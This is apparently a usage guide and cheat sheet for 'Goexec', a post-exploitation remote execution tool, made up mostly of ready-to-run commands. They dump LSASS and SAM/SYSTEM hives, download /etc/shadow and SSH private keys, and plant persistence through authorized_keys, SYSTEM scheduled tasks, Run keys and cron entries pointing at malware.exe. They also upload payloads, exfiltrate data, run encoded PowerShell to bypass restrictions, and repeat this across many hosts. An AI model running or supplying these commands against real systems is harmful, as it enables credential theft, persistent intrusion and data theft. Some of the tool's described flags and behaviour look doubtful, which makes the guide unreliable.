Goexec

Goexec is a multi-protocol remote command execution framework designed for post-exploitation. It provides unified command execution across SSH, RDP, WinRM, and PSRP, with support for file transfer, interactive shells, and batch operations.

Installation

# Build from Go source
git clone https://github.com/rapid7/goexec
cd goexec
go build -o goexec

# Download binary
wget https://github.com/rapid7/goexec/releases/latest/download/goexec-linux-x64
chmod +x goexec-linux-x64

SSH Execution

Basic SSH Commands

# Execute single command
./goexec ssh -u username -p password -h target.com 'whoami'

# With key-based authentication
./goexec ssh -u username -k ~/.ssh/id_rsa -h target.com 'id'

# Custom port
./goexec ssh -u username -p password -h target.com:2222 'uname -a'

# Passphrase-protected key
./goexec ssh -u username -k ~/.ssh/id_rsa --keypass passphrase -h target.com 'ls -la'

# Trust unknown hosts
./goexec ssh -u username -p password -h target.com --trust-unknown-hosts 'hostname'

SSH Options

# Verbose output
./goexec ssh -u username -p password -h target.com --verbose 'whoami'

# Custom timeout
./goexec ssh -u username -p password -h target.com --timeout 30 'long_command'

# SSH version specification
./goexec ssh -u username -p password -h target.com --ssh-version 2 'command'

Interactive SSH Shell

# Start interactive session
./goexec ssh -u username -p password -h target.com shell

# Type commands interactively
whoami
id
pwd
ls -la /etc/passwd
exit

Windows RDP Execution

RDP Command Execution

# Execute command via RDP
./goexec rdp -u domain\\username -p password -h target.com 'whoami'

# Alternate domain format
./goexec rdp -u username -p password -h target.com 'Get-Process'

# Custom RDP port
./goexec rdp -u username -p password -h target.com:3389 'ipconfig'

# Get system info
./goexec rdp -u domain\\user -p pass -h target.com 'systeminfo'

Windows WinRM Execution

PowerShell via WinRM

# Execute PowerShell command
./goexec winrm -u username -p password -h target.com 'Get-Process'

# List running services
./goexec winrm -u username -p password -h target.com 'Get-Service | Select Name,Status'

# Get network configuration
./goexec winrm -u username -p password -h target.com 'ipconfig /all'

# Get system information
./goexec winrm -u username -p password -h target.com 'systeminfo'

# Execute batch command
./goexec winrm -u username -p password -h target.com 'cmd /c whoami'

WinRM Configuration

# Standard WinRM port (HTTP)
./goexec winrm -u username -p password -h target.com:5985 'whoami'

# HTTPS WinRM (port 5986)
./goexec winrm -u username -p password -h target.com:5986 --https 'whoami'

# Skip SSL verification
./goexec winrm -u username -p password -h target.com:5986 --https --insecure 'whoami'

PowerShell Script Execution

# Execute PowerShell script
./goexec winrm -u username -p password -h target.com \
  'powershell.exe -File C:\\scripts\\deploy.ps1'

# Execute inline PowerShell
./goexec winrm -u username -p password -h target.com \
  'powershell.exe -Command "Get-MpComputerStatus"'

# Encoded command (bypass restrictions)
COMMAND='Write-Host "Executing"'
ENCODED=$(echo -n "$COMMAND" | base64 -w 0)
./goexec winrm -u username -p password -h target.com \
  "powershell.exe -EncodedCommand $ENCODED"

# PowerShell remoting
./goexec winrm -u username -p password -h target.com \
  'Invoke-Command -ComputerName server01 -ScriptBlock { Get-Process }'

File Transfer

Upload Files

# Upload via SSH SCP
./goexec ssh -u username -p password -h target.com \
  --upload /local/path/file.txt /remote/path/file.txt

# Upload via RDP
./goexec rdp -u username -p password -h target.com \
  --upload payload.exe C:\\Windows\\Temp\\payload.exe

# Upload via WinRM
./goexec winrm -u username -p password -h target.com \
  --upload malware.exe C:\\temp\\malware.exe

Download Files

# Download via SSH
./goexec ssh -u username -p password -h target.com \
  --download /remote/path/file.txt /local/path/file.txt

# Download sensitive files
./goexec ssh -u username -p password -h target.com \
  --download /etc/shadow ./shadow.txt

# Download via RDP
./goexec rdp -u username -p password -h target.com \
  --download C:\\Users\\username\\Documents\\secret.txt ./secret.txt

# Recursive directory download
./goexec ssh -u username -p password -h target.com \
  --download-dir /remote/directory /local/directory

System Reconnaissance

Linux/Unix Commands

# Basic system info
./goexec ssh -u user -p pass -h target.com 'uname -a'
./goexec ssh -u user -p pass -h target.com 'cat /etc/os-release'

# Network information
./goexec ssh -u user -p pass -h target.com 'ip addr show'
./goexec ssh -u user -p pass -h target.com 'netstat -tulpn'

# User enumeration
./goexec ssh -u user -p pass -h target.com 'cat /etc/passwd'
./goexec ssh -u user -p pass -h target.com 'id'

# Sudo privileges
./goexec ssh -u user -p pass -h target.com 'sudo -l'

# Installed software
./goexec ssh -u user -p pass -h target.com 'dpkg -l'
./goexec ssh -u user -p pass -h target.com 'rpm -qa'

Windows Commands

# System information
./goexec winrm -u user -p pass -h target.com 'systeminfo'
./goexec winrm -u user -p pass -h target.com 'wmic os get caption'

# Network config
./goexec winrm -u user -p pass -h target.com 'ipconfig /all'
./goexec winrm -u user -p pass -h target.com 'netstat -ano'

# User enumeration
./goexec winrm -u user -p pass -h target.com 'net user'
./goexec winrm -u user -p pass -h target.com 'whoami'

# Installed software
./goexec winrm -u user -p pass -h target.com 'wmic product list'
./goexec winrm -u user -p pass -h target.com 'Get-WmiObject -Class Win32_Product'

Credential Harvesting

LSASS Dumping

# Dump LSASS process memory
./goexec winrm -u user -p pass -h target.com \
  'powershell.exe -Command "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump (Get-Process lsass).Id C:\\temp\\lsass.dmp full"'

# Using procdump
./goexec winrm -u user -p pass -h target.com \
  'C:\\tools\\procdump.exe -accepteula -ma lsass.exe C:\\temp\\lsass.dmp'

SAM Database Access

# Save SAM registry hive
./goexec winrm -u user -p pass -h target.com \
  'reg save HKLM\\SAM C:\\temp\\sam.reg'

# Save SYSTEM hive
./goexec winrm -u user -p pass -h target.com \
  'reg save HKLM\\SYSTEM C:\\temp\\system.reg'

# Extract and download
./goexec winrm -u user -p pass -h target.com --download C:\\temp\\sam.reg ./sam.reg

Linux Credential Harvesting

# Bash history
./goexec ssh -u user -p pass -h target.com 'cat ~/.bash_history'

# Auth logs
./goexec ssh -u user -p pass -h target.com 'cat /var/log/auth.log | grep sudo'

# SSH keys
./goexec ssh -u user -p pass -h target.com --download ~/.ssh/id_rsa ./id_rsa

Persistence Mechanisms

SSH Key Persistence

# Add SSH key to authorized_keys
./goexec ssh -u user -p pass -h target.com \
  'echo "ssh-rsa AAAAB3NzaC..." >> ~/.ssh/authorized_keys'

# Create .ssh directory if needed
./goexec ssh -u user -p pass -h target.com \
  'mkdir -p ~/.ssh && echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys'

Windows Scheduled Task

# Create scheduled task
./goexec winrm -u user -p pass -h target.com \
  'schtasks /create /tn "SystemUpdate" /tr "C:\\malware.exe" /sc onstart'

# With SYSTEM privileges
./goexec winrm -u user -p pass -h target.com \
  'schtasks /create /tn "Update" /tr "C:\\malware.exe" /sc hourly /ru SYSTEM'

Windows Registry Persistence

# Run registry entry
./goexec winrm -u user -p pass -h target.com \
  'reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Update /d C:\\malware.exe'

# Startup folder
./goexec winrm -u user -p pass -h target.com \
  'copy C:\\malware.exe "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"'

Linux Cron Persistence

# Add cron job
./goexec ssh -u user -p pass -h target.com \
  'echo "0 */4 * * * /opt/update.sh" | crontab -'

# Systemd timer
./goexec ssh -u user -p pass -h target.com \
  'systemctl --user enable persistence.timer'

Data Exfiltration

File Collection

# Copy sensitive files
./goexec ssh -u user -p pass -h target.com --download /etc/shadow ./shadow.txt
./goexec ssh -u user -p pass -h target.com --download /etc/passwd ./passwd.txt

# Archive and exfiltrate
./goexec ssh -u user -p pass -h target.com 'tar czf - /var/www' > website.tar.gz

# Windows data exfiltration
./goexec winrm -u user -p pass -h target.com \
  'Get-Content C:\\sensitive\\data.txt' > exfil.txt

Batch Operations

Execute on Multiple Hosts

#!/bin/bash
# Process multiple targets

cat > targets.txt << 'EOF'
192.168.1.10
192.168.1.11
192.168.1.12
EOF

for target in $(cat targets.txt); do
    echo "[*] Executing on $target"
    ./goexec ssh -u username -p password -h "$target" 'whoami'
done

Parallel Execution

# Execute in parallel
cat targets.txt | parallel -j 4 \
  ./goexec ssh -u username -p password -h {} 'id'

# With xargs
cat targets.txt | xargs -P 4 -I {} \
  ./goexec ssh -u username -p password -h {} 'ps aux'

Security Considerations

• Only use with proper authorization
• Log all command execution
• Rotate compromised credentials
• Monitor for suspicious activity
• Clean up artifacts
• Use encrypted channels
• Implement access controls
• Document all activities

References

• Goexec GitHub
• WinRM Protocol
• SSH Security Guide
• MITRE ATT&CK Lateral Movement

---

Last updated: 2026-03-30